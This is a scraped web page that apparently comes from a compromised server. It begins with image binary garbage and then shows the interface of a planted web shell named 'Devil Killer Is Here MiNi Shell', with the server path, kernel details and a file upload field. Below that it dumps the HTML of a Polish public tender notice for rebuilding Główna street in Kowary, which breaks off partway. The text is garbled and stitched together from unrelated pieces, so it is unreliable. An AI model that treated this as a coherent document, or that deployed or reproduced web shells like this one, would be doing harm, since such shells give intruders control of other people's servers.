JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220930/0037185101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa ulicy Głównej w Kowarach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA KOWARY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821598</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 1 Maja 1 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kowary</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-530</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">756439225</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">757613173</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bok@kowary.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.kowary.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa ulicy Głównej w Kowarach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6246765b-408b-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00371851</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033328/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Przebudowa ulicy Głównej w Kowarach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.bip.kowary.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">rejestracja na platformie, w tym złożenie oferty w formie elektronicznej, a także warunki techniczne dotyczące korzystania z Platformy zostały określone w Regulaminie e-zamówienia, dostępnym pod adresem<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administrator, dane kontaktowe:Urząd Miasta Kowary, ul. 1 Maja 1a, 58-530 Kowary: • na adres poczty elektronicznej: bok@kowary.pl, • telefonicznie: +48 75 64 39 222, • pisemnie lub osobiście: na adres wskazany powyżej<br/>Inspektor Ochrony Danych:W Urzędzie Miasta Kowary został wyznaczony Inspektor Ochrony Danych, z którym można się skontaktować:• za pomocą poczty elektronicznej: iod@kowary.pl <br/>Cele przetwarzania, podstawa prawna przetwarzania, czas przechowywania poszczególnych kategorii danych:Dane będą przetwarzane przez Urząd Miasta i Kowary wyłącznie w celu związanym z postępowaniem o udzielenie zamówienia publicznego na podstawie:<br/> • art. 6 ust. 1 lit. c) i e) RODO na podstawie Ustawy z dnia 11 września 2019r. prawo zamówień publicznych <br/>Dane będą przechowywane przez okres 4 lat od zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>Odbiorcy danych:Dane mogą zostać udostępnione osobom lub podmiotom, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ustawy z dnia 11 września 2019 r. prawo zamówień publicznych. <br/>Prawa osoby, której dane dotyczą:Przysługujące prawa: • na podstawie art. 15 RODO prawo dostępu do danych osobowych;• na podstawie art. 16 RODO prawo do sprostowania;• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/> • prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>Prawa nie mające zastosowania: • w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; • prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; • na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. * Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.** **Wyjaśnienie: W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRM.271.84.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: „Przebudowa ulicy Głównej w Kowarach”<br/><br/>Adres inwestycji: miejscowość Kowary, działki nr 35/3, 35/1, obręb geodezyjny Kowary 0005<br/><br/>Opis przedmiotu zamówienia:<br/>1. Roboty przygotowawcze i rozbiórkowe;<br/>a) obsługa geodezyjna – 0,170 km<br/>b) przestawienie ogrodzeń – 55mb, <br/>c) roboty ziemne pod konstrukcje -297,84 m3.<br/><br/>2. kanał technologiczny:<br/>a) wykopy i przekopy wykonne koparkami na odkład -36,50 m3,<br/>b) kanał rurowy z materiałów sypkich o gr. 10 cm- 89,00 m2,<br/>c) kanał z rur PVC o śr, 125 mm- 323,60 mb,<br/>d) kanał rurowy – zasypka o gr.10 cm – 80 m2,<br/>e) podłoże betonowe o gr. 15 cm – pod studnie – 1,35 m3,<br/>f) studnie technologiczne betonowe prostokątne 1,29x 0,80 w gotowym wykopie o wysokości 0,80 m - 6szt.<br/>3. Podbudowy i Nawierzchnie:<br/>a) profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne – 992,60m2;<br/>b) warstwa odsączająca zagęszczona mechanicznie - 6 cm po zagęszczeniu - 992,60 m2,<br/>c) ława pod krawężniki betonowa z oporem - 12,62 m3, <br/>d) ułożenie krawężników betonowych o wym. 15x22 cm – 210 mb,<br/>e) ława betonowa pod ściek z prefabrykatów betonowych – 11,13 m3,<br/>f) ściek z prefabrykatów betonowych o gr. 20 cm na podsypce cementowo- piaskowej – 159,mb, <br/>g) podbudowa kruszywa łamanego – warstwa dolna o gr po zagęszczeniu 15 cm – 875,90 m2;<br/>h) podbudowa kruszywa łamanego warstwa górna o gr. po zagęszczeniu 8 cm – 875,90 m2.<br/>i) nawierzchnia z kostki betonowej o gr.10 cm na podsypce cementowo- pisakowej – 630,90 m2.<br/><br/>4. Roboty wykończeniowe i towarzyszące:<br/>a) profilowanie poboczy niesortem kamiennym 0/31,5 zagęszczeniem – 10,73 m3,<br/>b) kanał z rur PVC o śr, 250 mm – 6,00 mb, <br/>c) studnie ściekowe uliczne ośr. 500 mm z osadnikiem i syfonem- 1 szt, -3szt;<br/>d) wykonanie ścianki czołowej przepustu z kamienia na zap. cementowej – 1,12 m3,<br/>e) poręcza ochronna z pochwytem z rur o śr.6 i 38 mm w rozstawie słupków z rur śr. 80 mm2 5 m-3 szt,<br/>f) regulacja pionowa zaworów sieci wodociągowej, gazowej, kanalizacji sanitarnej – 14 szt;<br/>g) ustawienie słupków z rur stalowych ocynkowanych fi 70 mm do znaków pionowych – 3 szt,<br/>h) przymocowanie tarcz znaków pionowych. 5 szt.<br/>5. Oświetlenie uliczne: <br/>a) roboty pomiarowe - ,170 km,<br/>b) kopanie koparkami rowów dla kabli – 142,0 mb,<br/>c) zasypanie rowów – 142 mb,<br/>6. roboty montażowe <br/>a) montaż skrzynek na słupach odgromników – 3 kpl,<br/>c) montaż mostków rozłączonych dla linii niskiego napięci a- 10 szt,<br/>d) nasypanie warstwy piasku o gr. 0,1 m na dno rou o szer.do 0,4 m – 168,00 mb,<br/>e) ułożenie rur osłonowych z HDPE o śr. do 140 mm- 20,00 mb,<br/>d) ułożenie rur osłonowych z HDPE o śr. do 140 mm-183,00 mb,<br/>e) montaż rur stalowych osłonowych o śr.100 mm na słupach – 3 mb,<br/>f) montaż uszczelnień rur osłonowych -0 1 szt,<br/>g) układanie kabli o masie do 1,0 mkg/m w rurach - 20 mb,<br/>h) układanie kabli o masie do 1,0 mkg/m w rurach- 191 mb,<br/>g) oznakowanie trasy kabla ułożonego – 168,00 mb,<br/>i) montaż słupów oświetleniowych do 100 kg na fundamencie – 5 szt,<br/>j) zarobienie na sucho końca kabla 5-żyłowego o przekroju żył do 50 mm2 na napięcie do 1 kV o izolacji i powłoce z tworzyw sztucznych -10 szt,<br/>k) montaż wysięgników rurowych o masie do 30 kg na słupie - 1r/0,5/5 st./fi 60 – 5 szt,<br/>l) montaż przewodów do opraw oświetleniowych - wciąganie w słupy, rury osłonowe i wysięgniki przy wysokości latarń do 10 m – 5 kpl przew.,<br/>m) montaż opraw oświetlenia zewnętrznego na wysięgniku – 5 szt,<br/>n) montaż uziomów poziomych w wykopie o głębokości do 0.6 m; kat.gruntu IV – 189,00 mb.<br/>7. Pomiary ochronne:<br/>a) sprawdzenie punktu odbioru energii – 7 pkt,<br/>b) sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia -5 pomiar,<br/>c) sprawdzenie i pomiar kompletnego 2,3-fazowego obwodu elektrycznego niskiego napięcia – 6 pomiar,<br/>d) badanie linii kablowej o ilości żył do 4 – 6 odc,<br/>e) pierwszy pomiar uziemienia ochronnego lub roboczego- 7 pomiar,<br/>f) pierwszy pomiar skuteczności zerowania – 7 pomiar.<br/>8. Roboty demontażowe:<br/>a) demontaż opraw oświetlenia zewnętrznego na wysięgniku do ponownego montażu – 3 szt,<br/>b)Demontaż wysięgników rurowych o masie do 15 kg na słupie-3 szt,<br/>c)Demontaż konstrukcji stalowych i osprzętu linii napowietrznej nn – bezpiecznik – 3 szt,<br/>d)Demontaż mostków rozłącznych (przekrój przewodów do 70 mm2) dla linii niskiego napięcia – 9 szt,<br/>e) Demontaż przewodów izolowanych linii napowietrznej nn typu AsXSn lub podobnych o przekroju 4x50 mm2 – 0,118 km przw.<br/>9. Szczegółowy opis robót budowlanych stanowiących przedmiot zamówienia określa dokumentacja projektowa obejmująca:<br/>a) Projekt budowlany – Załącznik nr 10 do SWZ,<br/>b) Projekt techniczny ( wykonawczy) załącznik nr 11 do SWZ<br/>c) Przedmiar Robót Drogowych– Załącznik nr 12 do SWZ,<br/>d) Przedmiar robót części elektrycznej – Załącznik nr 13 do SWZ,<br/>d) Ogólna Specyfikacja Techniczna Wykonania i Odbioru Robót – Załącznik nr 14 do SWZ.<br/>e) Projekt czasowej i stałej organizacji ruchu ( aktualizacja i zatwierdzenie) załącznik nr 15 do SWZ<br/>10. wykonanie tymczasowej organizacji ruchu ( aktualizacja i zatwierdzenie) ;<br/>11. Wykonawca zobowiązany jest do sporządzenia geodezyjnej inwentaryzacji powykonawczej.<br/>12.Wykonawca zobowiązany jest do wykonania operatu kolaudacyjnego.<br/>13. Przed rozpoczęciem robót Wykonawca zobowiązany jest powiadomić o ich rozpoczęciu wszystkich właścicieli sieci zlokalizowanych na odcinku objętym przedmiotem zamówienia.<br/>14. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie materiałów równoważnych o parametrach technicznych nie gorszych niż określono w dokumentacji technicznej.<br/>15. Zamawiający wymaga udzielenia co najmniej 36 miesięcznej gwarancji na wykonane roboty budowlane. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty zostanie dokonany w oparciu o następujące kryteria:<br/>1. cena brutto przedmiotu zamówienia – 60%.<br/>Oferta z najniższą ceną spośród ofert nieodrzuconych otrzyma 60 punktów. Pozostałe proporcjonalnie mniej, według formuły:<br/>(ano:ank x 60)=Pc<br/>Pc – ilość punktów ofert badanej w kryterium cena<br/>ano – najniższa cena brutto ze wszystkich ważnych ofert,<br/>ank – cena brutto badanej oferty.<br/>2. Okres gwarancji jakości dla przedmiotu zamówienia – 40%<br/>2.1. Zamawiający wymaga udzielenia min. 36 miesięcznej gwarancji licząc od dnia podpisania protokołu odbioru końcowego robót<br/>budowlanych.<br/>W ramach kryterium - „okres gwarancji” Zamawiający przyzna punkty za dodatkowy okres gwarancji na wykonany przedmiot<br/>zamówienia wg następujących zasad:<br/>Zaoferowany okres gwarancji<br/>brak dodatkowego okresu gwarancji (wymagany okres gwarancji wynosi min. 36 miesięcy) - 0 punktów<br/>12 miesięcy dodatkowego okresu gwarancji (tj. 48 miesięcy)-20 punktów<br/>24 miesiące dodatkowego okresu gwarancji (tj. 60 miesięcy i więcej)-40 punktów<br/>2.2. Wymagany okres gwarancji na wykonany przedmiot umowy wynosi min. 36 miesięcy od dnia podpisania protokołu odbioru<br/>końcowego robót budowlanych i nie jest punktowany. Wykonawca, który zaoferuje dodatkowy okres gwarancji dłuższy niż 60<br/>miesięcy, otrzyma dodatkowe punkty wg wyżej wskazanej tabeli. Za zaoferowany okres gwarancji powyżej 60 miesięcy, Wykonawca<br/>otrzyma 40 punktów.<br/>3. Łączna liczba punktów badanej oferty będzie liczona według poniższego wzoru:<br/>P = C + G<br/>P- łączna ilość punktów badanej oferty<br/>C – ilość punktów badanej oferty w kryterium oceny &#34;cena&#34;<br/>G – ilość punktów badanej oferty w kryterium oceny &#34;okres gwarancji&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/><br/>a) zdolności do występowania w obrocie gospodarczym,<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na podstawie ogólnego oświadczenia o spełnianiu warunków udziału w postępowaniu, zawartego w treści oświadczenia Wykonawcy.<br/><br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na podstawie ogólnego oświadczenia o spełnianiu warunków udziału w postępowaniu, zawartego w treści oświadczenia Wykonawcy, <br/><br/>c) sytuacji ekonomicznej lub finansowej,<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszej niż 300.000,00 zł;<br/><br/><br/>d) zdolności technicznej lub zawodowej, <br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że: <br/><br/> 1) w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie): wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej jedną robotę budowlaną z zakresu: remontu/budowy/przebudowy dróg o nawierzchni asfaltowej, o wartości tego zadania minimum 300.000,00 zł brutto z podaniem jej rodzaju, wartości, daty i miejsca wykonania oraz z załączeniem dowodów określających, czy ta robota budowlana została wykonana zgodnie z przepisami prawa budowlanego i prawidłowo ukończona, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/><br/> 2) w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże i udokumentuje, że dysponuje lub będzie dysponował minimum 1 osobą pełniącą funkcję kierownika budowy posiadającą uprawnienia w specjalności drogowej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 o ochronie konkurencji i konsumentów ( Dz. U. z 2021.275 ), z innym wykonawcą, który złożył ofertę w postępowaniu albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 6 do SWZ)<br/> b) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2. Wykaz podmiotowych środków dowodowych, które wykonawca składa w postępowaniu na wezwanie zamawiającego w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu należy złożyć w zakresie:<br/><br/> 1) zdolności do występowania w obrocie gospodarczym:<br/>z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów<br/>w przedmiotowym zakresie.<br/><br/> 2) uprawnień do 